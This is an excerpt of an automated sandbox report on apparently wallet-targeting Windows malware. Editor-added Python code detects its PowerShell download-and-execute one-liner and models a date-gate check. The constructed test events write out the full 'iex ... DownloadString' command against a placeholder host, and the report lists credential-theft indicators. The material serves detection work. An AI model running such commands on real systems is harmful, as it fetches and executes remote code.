                  • Instruction Fuzzy Hash: 10314BB4A00209EFDF14CF94C985BEE77B9FF49310F108159E915AB290DB78AA41CFA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: d85a555e3f06d04283034fe51e08fd84e513a610208d8a436471fcb47bf24b3c
                  • Instruction ID: b78207577cc7606113f756cb34d2dbf94e4998091fd27d78479772848a0b97c1
                  • Opcode Fuzzy Hash: d85a555e3f06d04283034fe51e08fd84e513a610208d8a436471fcb47bf24b3c
                  • Instruction Fuzzy Hash: 7D4107B150075C9FEB218B24CE84FFB7BEC9F45714F1444E8E98A86182E2719A44CF20
                  APIs
                  • lstrcat.KERNEL32(?,015EED70), ref: 009B47DB
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4801
                  • lstrcat.KERNEL32(?,?), ref: 009B4820
                  • lstrcat.KERNEL32(?,?), ref: 009B4834
                  • lstrcat.KERNEL32(?,015DCCC0), ref: 009B4847
                  • lstrcat.KERNEL32(?,?), ref: 009B485B
                  • lstrcat.KERNEL32(?,015EE468), ref: 009B486F
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8D90: GetFileAttributesA.KERNEL32(00000000,?,009A1B54,?,?,009C564C,?,?,009C0E1F), ref: 009B8D9F
                    • Part of subcall function 009B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009B4580
                    • Part of subcall function 009B4570: RtlAllocateHeap.NTDLL(00000000), ref: 009B4587
                    • Part of subcall function 009B4570: wsprintfA.USER32 ref: 009B45A6
                    • Part of subcall function 009B4570: FindFirstFileA.KERNEL32(?,?), ref: 009B45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 6d19fd8f2c5ceffdc3026d2221223d4daf8070acb7cf8567dcb22f7500347e10
                  • Instruction ID: 81847dde2cdc95e8919737db102ef0a33e5cac0519d3a89446b8e7b707d0cf9e
                  • Opcode Fuzzy Hash: 6d19fd8f2c5ceffdc3026d2221223d4daf8070acb7cf8567dcb22f7500347e10
                  • Instruction Fuzzy Hash: 833153B690021867DB14FBB0DCC9FEE737CAB98700F404989B35997091EE74A789CB95
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B2D85
                  Strings
                  • <, xrefs: 009B2D39
                  • ')", xrefs: 009B2CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009B2CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009B2D04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: eab2587f7fd2d1c8ac0d5b04152d1254c79f096205e949ca1431bdbc4bb60a31
                  • Instruction ID: 659df8fc547b478d97c2a3b0911c9e95b39816da26cdb068b0839fe5ca97a3b7
                  • Opcode Fuzzy Hash: eab2587f7fd2d1c8ac0d5b04152d1254c79f096205e949ca1431bdbc4bb60a31
                  • Instruction Fuzzy Hash: 5441C171C10208AADB14FFA0C9A1FDDB778AF94710F404119F116BB191DF746A4ACF96
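The strings listed for the function above are the pieces of a PowerShell download-and-execute one-liner: the code concatenates `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL the report does not show, and `')"`, then launches it through ShellExecuteEx (this is what the "Yara detected Powershell download and execute" signature fires on). The Python below is an added example written by the editor, not code from the report or from the sample, showing how a detection engineer would match that command-line shape in process-creation telemetry. The event records are constructed, the Sysmon-style field names are an assumption, and `http://example.invalid/stage.ps1` is a placeholder URL, not the one the sample uses.

```python
import re
from typing import Dict, List, Optional

# Indicator patterns built from the strings the report lists for the function
# above.  Matching is case-insensitive because PowerShell is.
_RE_POWERSHELL = re.compile(r"(?i)\bpowershell(?:\.exe)?\b")
_RE_NOPROFILE = re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?(?=\s|$)")
_RE_IEX = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
_RE_DOWNLOADSTRING = re.compile(
    r"(?i)new-object\s+(?:system\.)?net\.webclient\s*\)?\s*\.\s*downloadstring"
    r"\s*\(\s*['\"]([^'\"]*)['\"]"
)
# The sample is 32-bit, so on 64-bit Windows it reaches the SysWOW64 PowerShell;
# a WOW64 PowerShell launched by a non-system process deserves its own flag.
_RE_WOW64 = re.compile(r"(?i)\\syswow64\\windowspowershell\\")
_RE_USER_PATH = re.compile(r"(?i)\\(?:users|temp|programdata)\\")


def analyze_cmdline(cmdline: str) -> Optional[Dict[str, object]]:
    """Return the indicators hit (and the staged URL, if literal) for one process
    command line, or None when it is not a download-and-execute one-liner."""
    if not _RE_POWERSHELL.search(cmdline):
        return None
    hits: List[str] = []
    if _RE_NOPROFILE.search(cmdline):
        hits.append("no-profile")
    if _RE_IEX.search(cmdline):
        hits.append("invoke-expression")
    m = _RE_DOWNLOADSTRING.search(cmdline)
    url = m.group(1) if m else None
    if m:
        hits.append("webclient-downloadstring")
    if _RE_WOW64.search(cmdline):
        hits.append("wow64-powershell")
    # Alert only on the combination: -nop alone and DownloadString alone both
    # have legitimate administrative uses; iex of downloaded text does not.
    if "invoke-expression" in hits and "webclient-downloadstring" in hits:
        return {"indicators": hits, "url": url}
    return None


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyze_cmdline over process-creation records (Sysmon Event ID 1
    style fields, assumed) and add parent-process context to each finding."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        finding = analyze_cmdline(ev.get("CommandLine", ""))
        if finding is None:
            continue
        parent = ev.get("ParentImage", "")
        finding["parent"] = parent
        # The relationship a sandbox sees for this sample: a binary in a
        # user-writable directory spawning the stager.
        finding["parent_suspicious"] = bool(_RE_USER_PATH.search(parent))
        alerts.append(finding)
    return alerts


# Constructed sample events (not taken from the report); the URLs are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the launch shape the function above produces: file.exe -> 32-bit powershell.exe
        "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Users\\user\\Desktop\\file.exe",
        "CommandLine": "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -c "
                       "\"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\"",
    },
    {   # benign administrative use: no download, no invoke-expression
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Temp\"",
    },
    {   # same technique, different spelling, 64-bit host, system parent
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "powershell -w hidden -c \"IEX (New-Object System.Net.WebClient)"
                       ".DownloadString('http://example.invalid/a')\"",
    },
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Command-line matching catches the literal form this sample builds; an `-EncodedCommand` variant or a script that assigns the WebClient to a variable first slips past these patterns, so pair this with PowerShell script-block logging (Event ID 4104), which records the decoded text that actually runs.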
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009A9F41
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 0f4981b2ddd7b634601b0a315699f3caa6c815ab83c0089007dd9c97099ad353
                  • Instruction ID: 3a03465ef09c6b3e9158c84fe99361390422a42bdb76c076e5fcf62edfc4e411
                  • Opcode Fuzzy Hash: 0f4981b2ddd7b634601b0a315699f3caa6c815ab83c0089007dd9c97099ad353
                  • Instruction Fuzzy Hash: 3C613E70A00248EBDB24EFA4CD96FED77B9AF85314F008418F90A5F591EF746A05CB92
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 009B696C
                  • sscanf.NTDLL ref: 009B6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009B69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009B69C0
                  • ExitProcess.KERNEL32 ref: 009B69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 0c62e64857ab64e12644d3088538fe38cf95b6e2085fbb1ac359f60795da64eb
                  • Instruction ID: a6b44ec14b3be8956de3e931900c90617c94d464e3d4bb57c76c0d153ac2b4f0
                  • Opcode Fuzzy Hash: 0c62e64857ab64e12644d3088538fe38cf95b6e2085fbb1ac359f60795da64eb
                  • Instruction Fuzzy Hash: 6221CB75D14209ABCF04EFE4D985AEEB7B9FF48300F04852AE406E7250EB346609CB69
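The call sequence listed for the function above (GetSystemTime, sscanf, SystemTimeToFileTime twice, ExitProcess) has the shape of a date gate: the current time and a date parsed from a string are both converted to FILETIME, compared, and one outcome ends the process. The report shows only the calls, not the sscanf format string, the embedded date or the direction of the comparison, so the reconstruction below is the editor's added example, not the sample's code; it assumes a `YYYY-MM-DD` string and an exit when the clock is past the cut-off. It shows the FILETIME arithmetic such a comparison runs on, which is also what you need when decoding these values from a memory dump, and why a detonation VM whose clock is past the embedded date can see the process exit before it does anything else.

```python
import re
from datetime import datetime, timedelta, timezone

# SystemTimeToFileTime yields 100-nanosecond ticks since 1601-01-01 00:00 UTC.
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Assumed format for the string handed to sscanf; the report does not show the
# real format string or the embedded date.
_DATE_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})$")


def systemtime_to_filetime(dt: datetime) -> int:
    """Mirror SystemTimeToFileTime: aware datetime -> 64-bit FILETIME tick count."""
    delta = dt.astimezone(timezone.utc) - _EPOCH_1601
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def filetime_to_datetime(ft: int) -> datetime:
    """Inverse conversion, for reading FILETIME values out of a memory dump."""
    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def parse_expiry(text: str) -> datetime:
    """Stand-in for the sscanf call: parse 'YYYY-MM-DD' into a UTC midnight."""
    m = _DATE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised date string: {text!r}")
    year, month, day = (int(x) for x in m.groups())
    return datetime(year, month, day, tzinfo=timezone.utc)


def expired(now: datetime, expiry_text: str) -> bool:
    """True on the branch that would reach ExitProcess: both values become
    FILETIMEs and the current one is past the embedded cut-off (assumed direction)."""
    return systemtime_to_filetime(now) > systemtime_to_filetime(parse_expiry(expiry_text))


def gate(clock_text: str, expiry_text: str) -> str:
    """Outcome of the gate for a given VM clock date: 'ExitProcess' or 'continue'."""
    return "ExitProcess" if expired(parse_expiry(clock_text), expiry_text) else "continue"


if __name__ == "__main__":
    expiry = "2024-12-31"  # constructed cut-off, not the sample's real one
    for clock in ("2024-10-14", "2025-03-01"):
        print(f"VM clock {clock}, cut-off {expiry}: {gate(clock, expiry)}")
```

When re-detonating a sample whose run ends in ExitProcess right after this kind of sequence, set the VM clock back to the original analysis date (or patch the comparison) before concluding the sample is inert.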
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,015DCA08,00000000,00020119,?), ref: 009B7E5E
                  • RegQueryValueExA.ADVAPI32(?,015EE588,00000000,00000000,000000FF,000000FF), ref: 009B7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 009B7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: ff23914b681088e7d0526df9f83198d565ab8a3086f58c8d90dd07a4ae21f0ff
                  • Instruction ID: b59b3bf4ee8f469e853a9f833941497dd98d07098f51ccb07c7fdb14a67eea0a
                  • Opcode Fuzzy Hash: ff23914b681088e7d0526df9f83198d565ab8a3086f58c8d90dd07a4ae21f0ff
                  • Instruction Fuzzy Hash: F71151B1A44245EBD710CFD4DD89FBBFBBCEB44710F104259F605AB290DB7869008BA2
                  APIs
                  • StrStrA.SHLWAPI(015EED28,?,?,?,009B140C,?,015EED28,00000000), ref: 009B926C
                  • lstrcpyn.KERNEL32(00BEAB88,015EED28,015EED28,?,009B140C,?,015EED28), ref: 009B9290
                  • lstrlen.KERNEL32(?,?,009B140C,?,015EED28), ref: 009B92A7
                  • wsprintfA.USER32 ref: 009B92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 401da857aae23dc8707ba5881e0ccace76c94312e03cfca7a4c3f8f1e0c8b813
                  • Instruction ID: dc3677cc9ad192a52f04d703d9d65fab2934a1bfd76bc48db0b8b8c0d0bc8cf3
                  • Opcode Fuzzy Hash: 401da857aae23dc8707ba5881e0ccace76c94312e03cfca7a4c3f8f1e0c8b813
                  • Instruction Fuzzy Hash: 9A01C875900148FFCB04DFECC988EAE7BBDEF48354F108588F9099B204CA31AA40DB92
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009A12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009A12F5
                  • RegCloseKey.ADVAPI32(?), ref: 009A12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: the same 14 memory dumps listed under the first Memory Dump Source above
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 7ddf20ba7ff83f0e411c95e2d8ed1ba901d41df3a51bf37be7bdcd7dd0200e57
                  • Instruction ID: 3a7a66a467c3dbcf0e2d3e0197b2939a8c4596e23fdb7a1133190543327ce278
                  • Opcode Fuzzy Hash: 7ddf20ba7ff83f0e411c95e2d8ed1ba901d41df3a51bf37be7bdcd7dd0200e57
                  • Instruction Fuzzy Hash: 7A0136B5A40208BBDB00DFD0DC89FAEB7BCEB48701F008155FA059B2C0DA74AA018F51
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009B6663
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B6726
                  • ExitProcess.KERNEL32 ref: 009B6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: < (most likely not a string at all: the 0x3C seen on the stack before the ShellExecuteEx call at 009B6726 is 60, the size of SHELLEXECUTEINFOA on 32-bit Windows, i.e. the structure's cbSize field picked up as a one-character string)
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0a514751a0c94460cd861b7dceff3123d84ee683917a434c51a049ff38750abe
                  • Instruction ID: ba06a9df4700fe383c432d30b78d8d92ccee42940412d093bd7426032ea0bf81
                  • Opcode Fuzzy Hash: 0a514751a0c94460cd861b7dceff3123d84ee683917a434c51a049ff38750abe
                  • Instruction Fuzzy Hash: C03129B1801218AADB14EB90DD96BDEB77CAF88310F804189F20967191DF746B48CF6A
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009C0E28,00000000,?), ref: 009B882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8836
                  • wsprintfA.USER32 ref: 009B8850
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: fcb4c7b99e0c152f7bbf30f8cbbbc24f80a1d1317b3945e356bc2cb3e31bc233
                  • Instruction ID: ac111fbd60053d5baf4bd1977aad32f807cdf03961a5fa6705c1eaed017590b5
                  • Opcode Fuzzy Hash: fcb4c7b99e0c152f7bbf30f8cbbbc24f80a1d1317b3945e356bc2cb3e31bc233
                  • Instruction Fuzzy Hash: 8F2133B1A40244AFDB04DF94DD85FAEBBB8FB48711F104119F505AB280CB796901CBA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009B951E,00000000), ref: 009B8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8D62
                  • wsprintfW.USER32 ref: 009B8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 72017054f14f574a8f78d526e8fd9fc3dab9056c80e2026b15513799e29e7889
                  • Instruction ID: f0d80232123b539215a858df185df05d9cc8aac3c524b54d8742de1d495867c6
                  • Opcode Fuzzy Hash: 72017054f14f574a8f78d526e8fd9fc3dab9056c80e2026b15513799e29e7889
                  • Instruction Fuzzy Hash: A9E0ECB5A40208FBD710DB94DD4AE697BBCEB48702F044198FD099B280DE75AE109B96
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 009AA3FF
                  • lstrlen.KERNEL32(00000000), ref: 009AA6BC
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 009AA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
